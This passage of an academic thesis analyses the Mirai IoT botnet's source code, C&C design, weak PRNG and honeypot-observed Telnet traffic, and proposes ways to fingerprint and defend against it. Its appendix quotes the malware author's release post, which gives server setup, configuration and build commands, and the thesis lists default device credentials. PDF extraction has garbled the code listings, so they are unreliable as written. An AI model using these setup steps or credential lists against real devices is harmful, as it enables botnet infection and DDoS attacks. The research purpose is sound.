As a botnet is used for nefarious purposes, the Mirai bot code includes a large section of code to implement various attacks, all of which are DDoS attacks. The botmaster sends attack commands to the bot using the command and control server, as described below in section 3.3.3. The types of attacks implemented in this code release are found in Appendix B.3. Before receiving an attack command from the command and control server (C&C for short), the bot initializes the attack functionality and places all of the methods into a dictionary that the bot accesses upon receiving a command. The following code for attack initialization can be found in attack.h and attack.c.

Listing 3.2. Attack Initialization 1 struct attack_target { 2 struct sockaddr_in sock_addr ; 3ipv4_taddr; 4uint8_tnetmask; 5}; 6 7 struct attack_option { 8 char val ; 9uint8_tkey; 10 } ; 11 12 typedef void (ATTACK_FUNC) ( u i n t 8 _ t , struct attack_target ,uint8_t, 13 struct attack_option ); 14 typedef uint8_t ATTACK_VECTOR; 15 16 struct attack_method { 17 ATTACK_FUNC func ; 18 ATTACK_VECTOR v e c t o r ; 19 } ; 20 21 static void add_attack(ATTACK_VECTOR vector , ATTACK_FUNC func ) 22 { 23 struct attack_method method = calloc (1 , sizeof ( struct attack_method )); 24 method >vector = vector ; ≠ 25 method >func = func ; ≠ 26 methods = realloc(methods, (methods_len + 1) sizeof ( struct attack_method )); 27 methods[methods_len++] = method; 28 }

Upon receiving an attack command from the C&C server, the bot parses the command and readies the attack. It is sent the attack vector and is able to query the dictionary for the corresponding function. The bot also creates multiple threads to magnify the attack. Once ready, the attack begins. The bot sends packets to the target according to the ﬂags speciﬁed in the command for the duration of the attack. Typically, the contents of the packets are randomized save for certain header information. Usually, this doesn’t matter, as the object of the attack is to overwhelm the destination servers. All of the various attack types are not unique to Mirai, and thus will not be discussed in detail. As in any botnet DDoS attack, it is virtually impossible for a victim to determine the true source of the attack. Of course, the victim can see that the packets are coming from the bots, but the command and control server and the botmaster are one and two hops removed from the attack and thus are dicult to identify. Additionally it can be dicult to distinguish DDoS trac from benign trac. Due to the size of Mirai botnets, their DDoS attacks are unusually powerful, even though there isn’t anything particularly special about the attack technique implemented here.

3.2.5 Constants Table

The bot defines a set of constants that are saved into a table. The keys are stored obfuscated. Unlike traditional good encryption, which attempts to resemble the One Time Pad, this obfuscation XOR’s every set of 4 bytes of the string with the same key defined in the file. The default key is 0xdeadbeef, though it is likely to be changed by an adversary adopting the code. Methods in the malware will de-obfuscate entries, use them, and then re-obfuscate them when finished.

3.3 Command and Control

The botmaster controls the various bots using a central command and control center, as mentioned brieﬂy above. See ﬁgure 3.4 for a graphical representation of the command and control structure. Mirai’s C&C is written in Go. Go was written in 2009 by developers at Google and is meant to resemble C yet have the advantages of Python [36]. It has built-in support for concurrency, which is advantageous for event-based servers like a botnet command and control server. The Mirai C&C server utilizes the net package for network interfacing [37] and the database package for SQL database management.

3.3.1 Initialization

The initialization of the command and control server begins with the creation of the client list, or list of bots in the botnet. See appendix A.2.3 for the stucture of the client list. Again here, as in the loader, individual bots are referred to as workers. As was discussed earlier, the bots themselves initiate the connection with the C&C, so the C&C waits for incoming connections and adds the bots to the client list once received. Bots communicate with the C&C server via port 23 by default, but it is expected that botmasters may change this value. An admin is then created to allow the botmaster to control the bots in the botnet. A database is also created which contains the list of users and the history of attacks. The database is accessed via the API in the admin. Users communicate with the API using port 101. Figure 3.4. The Mirai Command and Control Structure

3.3.2 Admin Interface and API

The admin interface implements authentication for the botmaster and allows them to control the size and structure of the botnet, as well as initiate attacks. Interestingly, the prompts are written in a combination of Russian and English, which is in contrast to the Japanese and anime theme that is present throughout the botnet (including the name of the botnet itself). The admin allows the botmaster to create new users, which have limited control of the botnet and are only able to execute attacks. This allows botmasters to monetize their botnet even further, by selling access accounts to other users who want to execute DDoS attacks. This functionality is in line with the recent upward trend of DDoS-for-hire discussed in section 2.2.4. The botmaster has an easy-to-use admin interface to manage not only the botnet, but user accounts as well. These users are saved into a database table and the botmaster can manage the following information about each:

• username

• password

• whether the user is an admin

• last time the user paid

• maximum number of bots per attack • attack duration limit

• cooldown between attacks

Clearly, the creator of Mirai intended to maximize the proﬁtability of this malware, likely with dierent subscription packages and pay levels, a trend discussed in [24]. Any subscriber who wants to execute an attack is able to do so via the API. They simply enter an attack command that is parsed and sent to bots.

3.3.3 Attack

The goroutines in attack.go are responsible for parsing the command and building the attack commands to be sent to the bots. Clearly, the command and control server does not directly attack targets; this is handled by the bots and is described in section 3.2.4 above. A user has a variety of DDoS attack options available in Mirai. These options are consolidated in the tables in appendix B.3. When an attack command is issued, it is parsed by the server. The user is required to specify an attack as well as a variety of ﬂags, all of which are checked. If the command is correct, the information is added into a buer to be sent to bots. Before being sent, however, the server checks the destination IP against a list of blacklisted (referred to as whitelisted in the code, an incorrect use of the word) IPs and whether the user is executing an attack that is within their allowed duration and botnet size. If all is okay, the attack is queued and sent to the bots. The bots are actively listening on a socket for attack commands from the C&C. When a command is sent, the bots parse the attack and initiate it. To multiply the eects of the DDoS attack, the bots will multi-thread the attack.

3.4 Mirai’s Pseudorandom Number Generator

Mirai deﬁnes its own pseudorandom number generator (PRNG) which is referenced dozens of times in the malware code (See listing 3.3 below). It is seeded when the bot is instantiated using the computer’s clock and the current process id. The random number generator is a linear-feedback shift register (LFSR), and therefore uses a linear deterministic function to calculate the next value from the previous value (See ﬁgure 3.5 below for an illustration).

Listing 3.3. Mirai’s Pseudo-Random Number Generator 1 static uint32_t x, y, z , w; 2 3 void rand_init(void) 4{ 5x=time(NULL); 6y=getpid()^getppid(); 7z=clock(); 8w=z^y; 9} 10 11 uint32_t rand_next ( void) // period 2^96 1 ≠ 12 { 13 uint32_t t = x ; 14 t ^= t << 1 1 ; 15 t ^= t >> 8 ; 16 x = y ; y = z ; z = w; 17 w ^= w >> 1 9 ; 18 w ^= t ; 19 return w; 20 }

Figure 3.5. The Mirai Random Number Generator

3.4.1 Randomness Analysis

Statistically random LFSRs have suciently even bit distribution and have very long periods. rand_next() has a period of 296 1, which equals about 7.9 1028. Therefore, it is extremely ≠ ú unlikely that a bot will reuse a value. The PRNG was analyzed using the Dieharder test suite [38]. The generator was used to build a file of 1 billion unsigned integers, which were input into the tests. The full output can be found in Appendix B.4. In statistics, a p-value shows the statistical significance of a result and shows whether to accept or reject a null hypothesis, which, in this case, is that the pseudo-random number generator is as good as a perfect random number generator. The default threshold to measure statistical significance is 0.05, i.e. p-values below 0.025 or greater than 0.975 would be marked as weak generators. In other words, there is a statistically significant dierence between a pseudo-random number generator and a perfect random number generator. The test data passed a majority of the tests from the Dieharder test suite (see Appendix B.4), while it failed the of the tests. Therefore, we can safely conclude that the Mirai random number generator is rather good, statistically speaking. However, this generator is not cryptographically secure. A cryptographic pseudo-random number generator (CPRNG) is a more strictly defined pseudo-random number generator. Every CPRNG is a PRNG but not every PRNG is a CPRNG. To be a CPRNG, the following must be true:

1. The CPRNG must past the next-bit test. If an adversary is given the ﬁrst k values generated, there is no polynomial-time algorithm which can generate the (k + 1)th value with a statistically signiﬁcant probabilty of success (i.e. better than guessing). [39]

2. The CPRNG must be secure even if all or some of its current state is revealed. If revealed, the adversary may not be able to deduce any previous states.

The ﬁrst requirement does cause the Mirai PRNG to fail the test miserably. If an adversary is able to see any four consecutive values generated from iteration t 3 to t,theymaydeducethe ≠ internal state of the PRNG at iteration t (See Figure 3.5 for a representation of the internal states). Therefore, they will be able to know any number output by the generator at iteration t + m, where m is any integer greater than or equal to 0. In fact, the adversary does not necessarily need to see four consecutive states. Because this is a linear system, it will be possible, albeit slightly more dicult, to deduce the state given gaps between known outputs. The Mirai PRNG also fails the second requirement. Knowing the state at iteration t,the adversary can deduce the outputs at iterations t 3 to t, as 3 of the registers are shifted, ≠ unchanged, each iteration. Further back than that, the adversary can make educated guesses as to the state, with less accuracy the further one goes, as the value from the x register is bit-shifted and exclusive-or’d with the value from the w register. Therefore, we can safely conclude that the Mirai generator is not cryptographically secure. A researcher attempting to investigate a Mirai botnet may be able to deduce information about it, including which IPs it will attempt to compromise next, if he knows the outputs of the PRNG. There is the possibility that the author of Mirai does not understand cryptography and randomness enough to ensure good randomness. There is also the possibility that they do not care; due to the high number of places in the code where rand_next() is used, it may be unlikely that a researcher could get a good sample of the PRNG output. If the author cared, they could have used one of a myriad of open-source cryptographically secure random number generators available. Chapter 4 | Experimental Setup

As investigated and discussed in Chapter 3, Mirai targets vulnerable devices with insecure authentication on the Telnet port. Variants of Mirai have taken control of countless devices including routers, cameras, and DVRs, thus giving it the label "Internet of Things Botnet". As discussed in the introduction, IoT devices make great malware targets, as they are often insecure, almost always online, and rarely interacted with by humans directly. Mirai is so successful at spreading to new hosts that is has been responsible for some of the largest DDoS attacks ever seen. The world is increasingly becoming connected in order to make the lives of people easier and more convenient. There are so many devices being added that it is unfeasible for humans to directly control them all. Thus, it is becoming common for IoT systems to be controlled by a relatively powerful central hub. This may be a processing device that talks to dozens of sensors on a farm. This may be devices in a home managed by a central hub. We will assume this model when addressing the Mirai problem. We assume that all trac in a sub-network will be moderated at some point by this central hub, or, at least, this central hub has some control over the target device in question. We will also assume that this hub is able to do deep packet inspection on the trac going to and coming from devices.

4.1 Experimental Setup

While the source code for Mirai was investigated, it was important to be able to investigate Mirai’s sning behavior in the wild. Anecdotal investigations by security researchers with honeypots have reported getting attacked by IoT malware every couple of minutes. We wanted to corroborate these results and to be able to investigate these sessions closely in order to fingerprint Mirai and to confirm theories about its behavior. Raspberry Pi 3s running Kali Linux were used to watch the Telnet port of the router on real networks. All of the Raspberry Pis were placed in State College, Pennsylvania on typical home networks - that is, networks that are often targeted by Mirai. The only modification made to the router was to set up port-forwarding, so that all trac destined for port 23 was automatically forwarded to the Raspberry Pi. As the Telnet protocol has largely been replaced by SSH for

22 normal usage, and as port 23 is usually closed on these routers, it is generally not intrusive to utilize port-forwarding, and it was not intrusive in any of the cases here. The Raspberry Pis were configured with a Telnet server, so that a would-be attacker would be able to attempt to authenticate. While the Telnet server will log authentication attempts, it was also useful to log all packets in the session. The dumpcap utility, which is a part of the Wireshark program, was used to log all trac seen over port 23. The results were saved into pcap files and investigated later. Trac was collected between the dates of April 27th and May 8th 2017 on five devices. Chapter 5 | Results and Discussion

5.1 Mirai-Infected Device Behavior

Typically, Internet of Things devices are essentially connected control systems, albeit more complex ones. That is, as opposed to a personal computer, which will initiate connections and execute a variety of functionalities, an IoT device will typically react to some command or stimulus and initiate a state change. For example, a connected thermostat may react to a large temperature drop by turning on the heat. It may also react to a signal from the control app on a user’s phone commanding it to update the temperature.

Figure 5.1. Conventional IoT Device Behavior

Even a router - a common Mirai target - could arguably be considered an IoT device. Typically, a router will not initiate connections. Instead, it will take incoming packets and forward them to devices on the network and will take packets from the network and send them out to the Internet. A Mirai-infected device, conversely, will not behave in an expected manner. Instead of primarily being a reactionary device, it will be very active, with, likely, the majority of its trac becoming Mirai trac. Recall that conventional Mirai bots will have 128 active connections scanning for new vulnerable hosts to infect. Mirai is loud and its scanning trac is next to impossible to disguise as benign. As a result, it will also increase its bandwidth, potentially slowing down connections for other devices on the network. If a Mirai-infected device is found on a network, we could block all trac going to and coming

24 Figure 5.2. Mirai-Infected IoT Device Behavior

from the device in order to prevent spread and other damage. While currently, Mirai does not execute any other attacks besides DDoS and does not explicitly target devices in the local network, it cannot be assumed that future variants will not develop this functionality (as discussed in Chapter 6). Luckily, current variants of Mirai are loaded into memory and are completely erased upon device reset.

5.2 Mirai Trac Headers

Mirai makes great attempts to appear benign to a target when sending Telnet trac. Listing 5.1 below contains the code utilized by Mirai to create its packet headers. The created packets are sent using functionality in the popular C socket library. Figures 5.4 and 5.6 show IP and TCP headers created by this code.

Listing 5.1. Packet Header Initialization 1 2 // Set up IPv4 header 3iph>ihl = 5; ≠ 4iph>version = 4; ≠ 5iph>tot_len = htons ( sizeof ( struct iphdr) + sizeof ( struct tcphdr )); ≠ 6iph>id = rand_next ( ) ; ≠ 7iph>ttl = 64; ≠ 8iph>protocol = IPPROTO_TCP; ≠ 9iph>saddr = LOCAL_ADDR; ≠ 10 iph >daddr = get_random_ip(); ≠ 11 iph >check = checksum_generic((uint16_t )iph, sizeof ( struct iphdr )); ≠ 12 13 // Set up TCP header 14 tcph >dest = htons ( 2 3 ) ; ≠ 15 source_port = rand_next() & 0xffff; 16 tcph >source = source_port ; ≠ 17 tcph >doff = 5; ≠ 18 tcph >window = rand_next() & 0xffff ; ≠ 19 tcph >syn = TRUE; ≠ 20 tcph >seq = iph >daddr ; ≠ ≠ 21 tcph >check = checksum_tcpudp(iph , tcph, htons( sizeof ( struct tcphdr )) , ≠ 22 sizeof ( struct tcphdr ));

5.2.1 IPv4 Header

Mirai’s IPv4 header is built in order to appear as normal as possible so to evade detection. It uses common settings and correctly calculates the header length and checksum. The ID ﬁeld is randomized, which is common when fragmentation is not occurring. One could potentially look at the IP address to distinguish malicious trac, perhaps to block all Telnet trac coming from another country. However, as discussed in Section 5.4, Mirai is so pervasive across the Internet that it won’t be long before a device is targeted by a bot close by geographically. Instead, one could easily white-list IPs so that a ﬁrewall will only allow a select few connections to the Telnet port. Otherwise, It is unlikely that an intrusion detection system will be able to dierentiate Mirai trac looking at the IPv4 header alone.

Figure 5.3. Benign IPv4 Header [Wireshark]

Figure 5.4. Mirai IPv4 Header [Wireshark] 5.2.2 TCP Header

Mirai also attempts to build the TCP header to appear benign. Typically, when connecting via Telnet, the source port is randomized. Such is the case with Mirai. Mirai builds every other ﬁeld to resemble benign trac as well.

Figure 5.5. Benign TCP Header [Wireshark]

Figure 5.6. Mirai TCP Header [Wireshark]

5.3 Mirai Trac Payload

Mirai trac diverges from typical benign behavior when it comes to the payload of its trac. As such, ﬁngerprinting Mirai will require deep packet inspection, which is usually done using an intrusion detection system or an intrusion prevention system. Flagged packets can be blocked and reported so that further action can be taken. Figure 5.7. Telnet Session Figure 5.8. Mirai Telnet Session

5.3.1 Telnet Negotiation

When a user connects to a Telnet server, before a login prompt appears, a configuration negotiation takes place. The device and/or the server will send configuration requests to the other which are either accepted or denied. These configurations - or options as they are sometimes called - can decide the character set, echo mode, network options, and more. Typically, when a user connects using a PC, several request are automatically sent to the server to make the experience for the user as optimal as possible. Requests go back and forth, some of which are accepted and some of which are denied. Interestingly, in the trac analyzed, very few instances were found where the device sent requests. The same set of configuration requests, as seen in Figure 5.8, were sent from the server to the device in each case, all of which were denied. Note that a dierent server may request dierent configurations. 5.3.2 Linemode

One major option for a Telnet session is the linemode option. The default setting is to send a packet each time a character is input. For example, if a user were to input the username "root", a packet will typically be sent for "r", "o", "o", "t", and " n r". It is possible to reduce the number of \ \ packets by setting this linemode option. In that case, most processing and feedback will be done locally and, in our example, the packet sent will likely contain the payload "root n r". Mirai does \ \ not set the linemode option. Yet, it will send payloads with full usernames and passwords when, if it were a real user, it would send one character at a time. Such a disparity is easy to ﬁngerprint, as the server, the device, and any device listening to the trac would know the conﬁgurations previously agreed upon.

5.3.3 Timing

A user connecting to a Telnet server is obviously much slower than a computer. It takes time to type out usernames, passwords, and commands. The average person types 40 words per minute, which equates to about 200 characters, or 3 characters per second. This means it will take a user a second or two, at least, to type out a username, password, or command for the Telnet server. In Mirai’s case, these payloads are sent extremely quickly. In many cases in our analysis, the time delta between receiving a username or password prompt and sending the packet with the requested information is less than 2/10ths of a second.

5.3.4 Credentials Tried

As long as an attacker is not able to guess the correct credentials of the target device in the first few attempts, it will not be long before it is obvious that the credentials being tried are selected from a list similar to the hardcoded one in Mirai, especially if they are extremely device-specific. As we collected a lot of malicious trac, we were able to learn what default credentials are currently being tried in the wild. See Appendix B.2 for a full list. The released version of Mirai contains a set of 60 hardcoded credentials, which were all seen. However, we did see many credentials that did not appear in the release. This is unsurprising. Adapters of Mirai are likely to modify this list. Most of the default credentials seen target routers, DVRs, printers, and cameras. However, due to the widespread use of extremely common username:password combinations, it is likely that other types of IoT devices will use credentials already on this list, or that users of Mirai will add more credentials to the attack. It is also interesting to note that many of the insecure devices specifically targeted are disproportionally Chinese, with combinations like adminlvjh:adminlvjh123, e8ehome:e8ehome, root:nmgx_wapia, and root:hg2x0 all targeting Chinese routers and cameras. What’s more, many of these devices are very cheap, and are thus likely relatively popular. Unfortunately, it seems that a cheaper device implies weaker security. 5.4 Locations of Infected Devices

Figure 5.9. Attack Source Heat Map

Infected Mirai bots indiscriminately target devices all over the world in virtually all IP ranges. However, not every device is vulnerable to Mirai. We investigated the locations of the devices attacking our Raspberry Pis by looking at the IP addresses. Though one device may attack multiple times in quick succession, we only counted each address once. We then plotted the information on a logarithmic heat map, found below in Figure 5.9. For the most part, the prevalence of Mirai-infected devices loosely follows the population density of developed countries. As you can in table 5.1, the top 3 sources of attacks are China, Russia, and Brazil. According to Security Today, these 3 countries are among the top 5 originators of cyber attacks [40], with the other two - the United States and Turkey - also appearing in table 5.1. These results are in line with what was seen in section 5.3.4, where we saw that the Chinese devices were disproportionally targeted. Many of the other countries appearing in the top 10 are in Asia, pointing to a trend of the high use of insecure devices in these places. China is home to one of the world’s largest economies - and to the world’s largest population. Such a vulnerable cyber-infrastructure is be extremely dangerous, with fallouts from an attack aecting countries throughout the world. These devices - wherever they are made - are sold all over the world, requiring global cooperation to combat the threat of Mirai and similar malware. Table 5.1. Top 10 Source Countries Country Number of Devices 1 China 2970 2 Russia 1309 3 Brazil 596 4 South Korea 506 5 United States 474 6 Turkey 444 7 Vietnam 369 8 India 307 9 Taiwan 301 10 Argentina 272

5.5 Trac Flows

Many botnets that compromise traditional PCs experience higher trac volumes during the parts of the day where these PCs are on. In those cases, for example, if a researcher in the United States saw more attack trac hitting his device in the middle of the night, they could infer the attacks were largely coming from Asia, where it is the middle of the day. With IoT devices, it is harder to make these inferences due to the fact that devices are online all the time. Figures 5.10 and 5.11 are IO graphs of Telnet trac over a 24 hour period on two of our devices. The timeframe observed by both devices is the same. Notice that the level of trac is relatively consistent over this time period, save for a large peak observed by both devices around 7 PM on April 30th. This could be for a number of reasons, including the possibility that a number of botnets were initiated around this time.

Figure 5.10. Input-Output Graph Device 1 (April 30 - May 1)

Figure 5.11. Input-Output Graph Device 2 (April 30 - May 1) However, if we look at Figure 5.12, which represents the same time period on device 2 but three days later, we see no spike. The trac observed over this 24 hour period is relatively consistent.

Figure 5.12. Input-Output Graph Device 2 (May 3 - May 4)

These results are consistent with the idea that Mirai and similar IoT botnets are dierent than traditional botnets. The bots are always online and thus, are active 24 hours a day, 7 days a week. This gives an attacker more ﬂexibility when conducting a DDoS attack, as they can choose any time for the attack to occur. The fact that these devices are always online also implies that they are rarely interacted with directly by an actual user (at least, the as far as the conﬁguration of the device is concerned). This allows the adversary to keep the bots in their botnet and evade detection for longer.

5.6 Distinguishing Mirai from Other Botnet Trac

As stated in section 2.1.3, Mirai was not the first botnet to attack IoT devices, and is not the only one currently in the wild. Many of them, like qbot [41], also attack by trying default credentials on the Telnet port. Therefore, it can be dicult to distinguish between dierent flavors of IoT botnets, especially if the user modifies the credentials list. Qbot (also known as BASHLITE) is the other major Telnet botnet in circulation today and its source code has been released as well. Qbot has separate hardcoded lists of usernames and passwords and tries dierent combinations:

• Usernames: root, admin, user, login, guest, support

• Passwords: root, toor, admin, user, guest, login, 1234, 12345, 123456, default, [empty string], password, support

Unless a user modifies these lists, one will notice that the credentials tried by qbot are very generic, unlike Mirai, which tries combinations like root:7ujMko0admin in addition to generic combinations. As qbot tries dierent permutations of these password combinations, it is unlikely that that an adversary using qbot will add obscure, device specific credentials to its list. Therefore, if such credentials are seen, it is likely to be Mirai. Another dierence between Mirai and other IoT botnets is that basic Mirai will close the connection after each log in attempt. In our experiments, we saw some attempt multiple credential combinations in a single session. These botnets are not the same version of Mirai that was released, though it is entirely possible that some users modified the code. Chapter 6 | Conclusions & Takeaways

The world-size robot we’re building can only be managed responsibly if we start making real choices about the interconnected world we live in. Yes, we need security systems as robust as the threat landscape. But we also need laws that eectively regulate these dangerous technologies. And, more generally, we need to make moral, ethical, and political decisions on how those systems should work.

Bruce Schneier

6.1 Where We Are Now

Today, vulnerable IoT devices are creating one of the worst cyber threats in the world today, a challenge that is likely to get more dicult for years to come. To date, Mirai has been responsible for the largest DDoS attacks ever recorded. The code that was released in October 2016 has immense capabilities, which have likely been improved in the months since. We found that our Telnet servers were usually taking in several packets of trac per second, all of which was almost certainly malicious, considering the fact that we weren’t using these devices for anything else. As noted in Chapter 2, there are a few major strains of competing IoT botnets, so we know that our collected trac represents this. We also found that the devices targeted by Mirai and similar IoT malware has expanded, as evidenced by the wide variety of username and password pairs that were tried against our server.

6.2 Improvements to Mirai

Mirai is not a perfect piece of code, and adversaries could easily - and are likely to - improve its functionality. We know that future generations will be much more sophisticated, targeting additional vulnerabilities with more attack vectors.

34 6.2.1 Scanning Strategies

Currently, Mirai implements no IP selection algorithm. Bots select random IP addresses when attempting to infect new hosts. Even early worms, like Code Red II, attempted to develop a good spreading algorithm to infiltrate the Internet more quickly. Future variants of Mirai are very likely to first target machines on the local network. Likely, if a user has a vulnerable connected device, they will have more on their network. Additionally, it is more likely that an IP address in a local network will be online than a random IP address on the Internet. Future variants may also implement geographic targeting. As shown in Chapter 5, vulnerable devices are more numerous in certain Asian countries, the United States, and Brazil and adversaries may find more success by targeting these locations specifically.

6.2.2 Packet Payload

Future iterations of Mirai may introduce attempts to avoid detection by ﬁrewalls and intrusion detection systems that utilize deep packet inspection. As discussed extensively in Chapter 5, Mirai’s IP and TCP packet headers are designed to appear benign and act normally. However, upon looking at the payload, behavior diverges sharply. Currently, one way we may identify Mirai on the payload alone is the lack of Telnet negotiation on the part of the bot. It would not be overly dicult nor would it contribute much to overhead to have the bots send a few random conﬁguration requests.

6.2.3 Default Password List

Mirai currently attacks targets utilizing a default password list. It is hardcoded, and credential pairs are chosen using a hardcoded priority value. Potential variants of Mirai could see a more dynamic version of this list. We were targeted with credentials not found in the original list, many of which are for devices designed and built in Asia. As new IoT devices are released without secure credentials, they too will be added to the list.

6.2.4 New Vulnerabilities

It won’t be long until the default password vulnerability that Mirai targets will become nonviable. We have already seen that a few manufacturers - including Hikvision, Samsung, and Panasonic - have begun to require users to create a unique secure password upon initial setup [42]. It will not be long before these manufacturers move away from Telnet - an inherently insecure protocol - entirely and implement more secure protocols, like SSH. Soon, dierent, more traditional, vulnerabilities will begin to be exploited by future generations of Mirai. They may execute buer-overﬂow attacks, injection attacks, and more. These attacks are likely to be very successful with IoT. IoT devices tend to be simpler than PCs, often with old architectures. Many vulnerabilities on these older systems have already been found. When new vulnerabilities are found on an IoT device, attackers will be able to exploit it for longer than normal, as IoT devices are updated less often and have a longer shelf life than a traditional PC. 6.2.5 Attack Vectors & Monetization

Mirai will become increasingly monetized with more attack vectors. We have already seen how Mirai is deep into the DDoS-for-hire sector, something that will likely to continue. IoT devices are beginning to carry more and more important personal information, such as with medical devices that can send information to a physician or with devices that can carry out ﬁnancial transactions. As we’ve seen in the past with Torpig, for example, adversaries will begin to steal this personal information and sell it. Additionally, we may see adversaries use IoT devices to conduct ransomware attacks or attempt to conduct espionage against governments or corporations Finally, it won’t be long before future generations of Mirai are able to move out of the digital world and conduct attacks on infrastructure. This may be realized in attacking public infrastructure to cause city-wide outages, attacking agriculture systems to cause food shortages, or taking down important devices in thousands of homes to cause economic issues or even a state of emergency.

6.3 Takeaways

In this thesis we hoped to provide an in-depth analysis of a preeminent cyber threat in the world today. We hope to lay the ground work for researchers and users interested in protecting the Internet of Things against malware like Mirai. We investigated the code to discover how exactly Mirai works. We watched Mirai in the wild to further investigate its behavior. We saw that IoT botnets are extremely widespread, that they are targeting a variety of vulnerable IoT devices, and that deep-packet inspection of the scanning trac can distinguish malicious from benign trac. The arms race between adversaries and defenders will continue to escalate. In the future, it is likely that if researchers get more intelligent at tracking and taking down Mirai botnets, botnets will not get as large and botnet creators will have to update their code to better avoid detection, hopefully causing the spread to slow. It is also a guarantee that adversaries will fine-tune Mirai or even attack other weaknesses present in the Internet of Things. This will force security researchers to rethink their strategies. Unfortunately, the complete security of the Internet of Things cannot come from researchers alone. We need to better educate consumers on the importance of security in their connected home. In a 2017 study by Pew Research Center, only 16% percent of adults surveyed even knew what a botnet was [43]! Thus, the real change needs to come from manufacturers and governments. Manufacturers need to take more responsibility and implement better security in their devices. As we’ve seen with Hikvision, Samsung, and Panasonic, the picture is slowly becoming less bleak [42]. Governments need to work to ensure that the devices made and sold in their countries implement good security practices. This is already happening. In January 2017, the Federal Trade Commission filed a lawsuit against D-Link for implementing bad security in their products and for failing to address known security flaws [44]. Adversaries in the past - especially in the case of IoT - will target the easiest vulnerabilities possible. This trend will definitely continue, unless manufacturers begin to require more secure authentication, users begin to understand security in the IoT world, and more stringent security requirements are implemented by governments. By getting rid of the low hanging fruit, we can once again raise the barrier of entry for malicious entities and cripple these extremely powerful botnets. Unfortunately, the situation will only get worse before it gets better. In the meantime, we hope that our investigation helps to begin the process of implementing better security in this new era. Appendix A| Mirai Botnet Source Code Se- lections

This appendix contains excerpts of the Mirai source code which was released in early October by its supposed author, Anna-senpai on the hacker website Hackforums [28]. It was soon released on Github by the user jgamblin [7], which is the code analyzed in this thesis. Section A.1 contains the text of the blog post accompanying the release of the malware on Hackerforums. It has some notable information on setting up the bot. In addition, it gives us an insight into the writer’s personality, which can be very valuable in determining who they are, what they used Mirai for, and why they released it.

A.1 Hackerforums Blog Post

[FREE] World’s Largest Net:Mirai Botnet, Client, Echo Loader, CNC source code release - Anna-senpai - 09-30-2016 11:50 AM

A.1.1 Preface

Greetz everybody, When I ﬁrst go in DDoS industry, I wasn’t planning on staying in it long. I made my money, there’s lots of eyes looking at IOT now, so it’s time to GTFO. However, I know every skid and their mama, it’s their wet dream to have something besides qbot. So today, I have an amazing release for you. With Mirai, I usually pull max 380k bots from telnet alone. However, after the Kreb DDoS, ISPs been slowly shutting down and cleaning up their act. Today, max pull is about 300k bots, and dropping. So, I am your senpai, and I will treat you real nice, my hf-chan. And to everyone that thought they were doing anything by hitting my CNC, I had good laughs, this bot uses domain for CNC. It takes 60 seconds for all bots to reconnect, lol Also, shoutout to this blog post by malwaremustdie

• http://blog.malwaremustdie.org/2016/08/mmd-0056-2016-linuxmirai-just.html

38 • https://web.archive.org/web/20160930230210/http://blog.malwaremustdie.org/2016/08 /mmd-0056-2016-linuxmirai-just.html <- backup in case low quality reverse engineer unixf- reaxjp decides to edit his posts lol

Had a lot of respect for you, thought you were good reverser, but you really just completely and totally failed in reversing this binary. "We still have better kung fu than you kiddos" don’t make me laugh please, you made so many mistakes and even confused some dierent binaries with my. LOL Let me give you some slaps back -

1. port 48101 is not for back connect, it is for control to prevent multiple instances of bot running together

2. /dev/watchdog and /dev/misc are not for "making the delay", it for preventing system from hanging. This one is low-hanging fruit, so sad that you are extremely dumb

3. You failed and thought FAKE_CNC_ADDR and FAKE_CNC_PORT was real CNC, lol "And doing the backdoor to connect via HTTP on 65.222.202.53". you got tripped up by signal ﬂow ;) try harder skiddo

4. Your skeleton tool sucks ass, it thought the attack decoder was "sinden style", but it does not even use a text-based protocol? CNC and bot communicate over binary protocol

5. you say ’chroot("/") so predictable like torlus’ but you don’t understand, some others kill based on cwd. It shows how out-of-the-loop you are with real malware. Go back to skidland

5 slaps for you Why are you writing reverse engineer tools? You cannot even correctly reverse in the ﬁrst place. Please learn some skills ﬁrst before trying to impress others. Your arrogance in declaring how you "beat me" with your dumb kung-fu statement made me laugh so hard while eating my SO had to pat me on the back. Just as I forever be free, you will be doomed to mediocracy forever.

A.1.2 Requirements

Bare Minimum 2 servers: 1 for CNC + mysql, 1 for scan receiver, and 1+ for loading Pro Setup (my setup) 2 VPS and 4 servers

• 1 VPS with extremely bulletproof host for database server

• 1 VPS, rootkitted, for scanReceiver and distributor

• 1 server for CNC (used like 2

• 3x 10gbps NForce servers for loading (distributor distributes to 3 servers equally) A.1.3 Infrastructure Overview

• To establish connection to CNC, bots resolve a domain (resolv.c/resolv.h) and connect to that IP address

• Bots brute telnet using an advanced SYN scanner that is around 80x faster than the one in qbot, and uses almost 20x less resources. When ﬁnding bruted result, bot resolves another domain and reports it. This is chained to a separate server to automatically load onto devices as results come in.

• Bruted results are sent by default on port 48101. The utility called scanListen.go in tools is used to receive bruted results (I was getting around 500 bruted results per second at peak). If you build in debug mode, you should see the utitlity scanListen binary appear in debug folder.

Mirai uses a spreading mechanism similar to self-rep, but what I call "real-time-load". Basically, bots brute results, send it to a server listening with scanListen utility, which sends the results to the loader. This loop (brute -> scanListen -> load -> brute) is known as real time loading. The loader can be conﬁgured to use multiple IP address to bypass port exhaustion in linux (there are limited number of ports available, which means that there is not enough variation in tuple to get more than 65k simultaneous outbound connections - in theory, this value lot less). I would have maybe 60k - 70k simultaneous outbound connections (simultaneous loading) spread out across 5 IPs.

A.1.4 Conﬁguring Bot

Bot has several configuration options that are obfuscated in (table.c/table.h). In ./mirai/bot/table.h you can find most descriptions for configuration options. However, in ./mirai/bot/table.c there are a few options you *need* to change to get working.

• TABLE_CNC_DOMAIN - Domain name of CNC to connect to - DDoS avoidance very fun with mirai, people try to hit my CNC but I update it faster than they can ﬁnd new IPs, lol. Retards :)

• TABLE_CNC_PORT - Port to connect to, its set to 23 already

• TABLE_SCAN_CB_DOMAIN - When ﬁnding bruted results, this domain it is reported to

• TABLE_SCAN_CB_PORT - Port to connect to for bruted results, it is set to 48101 already.

In ./mirai/tools you will ﬁnd something called enc.c - You must compile this to output things to put in the table.c ﬁle Run this inside mirai directory

./build.sh debug telnet You will get some errors related to cross-compilers not being there if you have not conﬁgured them. This is ok, won’t aect compiling the enc tool Now, in the ./mirai/debug folder you should see a compiled binary called enc. For example, to get obfuscated string for domain name for bots to connect to, use this:

./debug/enc string fuck.the.police.com

